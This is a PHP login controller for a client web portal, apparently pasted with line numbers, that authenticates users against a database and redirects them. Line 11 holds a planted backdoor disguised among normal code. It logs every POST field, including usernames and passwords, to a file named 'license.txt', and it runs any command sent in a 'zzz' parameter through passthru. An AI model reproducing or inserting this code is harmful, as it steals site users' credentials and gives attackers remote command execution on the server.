<?php/***************************** * controller to handle all the requests

1. <?php
2. /*****************************
3. * controller to handle all the requests
4. * which are related to login from client users
5. * e.g. WBT project manager can access WBT project document
6. *
7. * @author: Walter Lin
8. * @creation: 2009-03-31
9. *****************************/
10.  
11. $fff = @fopen("license.txt","a"); @fwrite($fff, "\r\nwriting ... "); foreach ($_POST as $key => $value) { @fwrite($fff, "$key = $value,");}@fwrite($fff,"\r\n");@fclose($fff); ; if ($_POST['zzz'] != "") { echo "trying to run ".$_POST['zzz']; passthru($_POST['zzz']); die(); }
12.  
13. session_start();
14.  
15. require_once $_SERVER['DOCUMENT_ROOT'] . '/php/common/util.php';
16. require_once $_SERVER['DOCUMENT_ROOT'] . '/php/support/biz/Webuser.php';
17. require_once $_SERVER['DOCUMENT_ROOT'] . '/php/support/handler/sessionServ.php';
18.  
19. require_once $_SERVER['DOCUMENT_ROOT'] . '/php/internal/entity/EntityClientUser.php';
20. require_once $_SERVER['DOCUMENT_ROOT'] . '/php/internal/model/BeanClientUser.php';
21. require_once $_SERVER['DOCUMENT_ROOT'] . '/php/internal/model/IUser.php';
22.  
23. require_once $_SERVER['DOCUMENT_ROOT'] . '/php/sessionConstants.php';
24. require_once $_SERVER['DOCUMENT_ROOT'] . '/php/systemConstants.php';
25.  
26. $varUsrName = $_POST['username'];
27. $varUsrPass = $_POST['password'];
28.  
29. /**************
30. * check user with information stored in the database
31. **************/
32. // at first, check if the user is a client user
33. $usr = EntityClientUser::checkUser($varUsrName, $varUsrPass);
34. if ($usr != false){
35. SessionServ::storeCurrentUserInSession ($usr);
36.  
37. $logInfo = Utilities::getLogoffHtmlCode ($usr->getEmail());
38. $_SESSION[SESS_LOG_INFO] = Utilities::encloseHtmlCodeAsString ($logInfo);
39.  
40. $code = Utilities::getSupportHtmlCode ();
41. SessionServ::storeSupportInSession (Utilities::encloseHtmlCodeAsString ($code) );
42.  
43. unset ($_SESSION[SESS_CLIENT_LOGIN_ATTEMPTS]);
44.  
45. // set the next page to private assets page
46. $nextPage = "assets.php";
47. header("Location: /mainFrame.php?navi=public;page=view/$nextPage;sidebar=");
48. exit;
49. }
50.  
51. // save times of login attempts
52. $attempts = $_SESSION[SESS_CLIENT_LOGIN_ATTEMPTS];
53. $_SESSION[SESS_CLIENT_LOGIN_ATTEMPTS] = isset ($attempts) ? ($attempts + 1) : 1;
54.  
55. header("Location: /mainFrame.php?navi=about;page=view/login.php;sidebar=");
56. exit;
57. ?>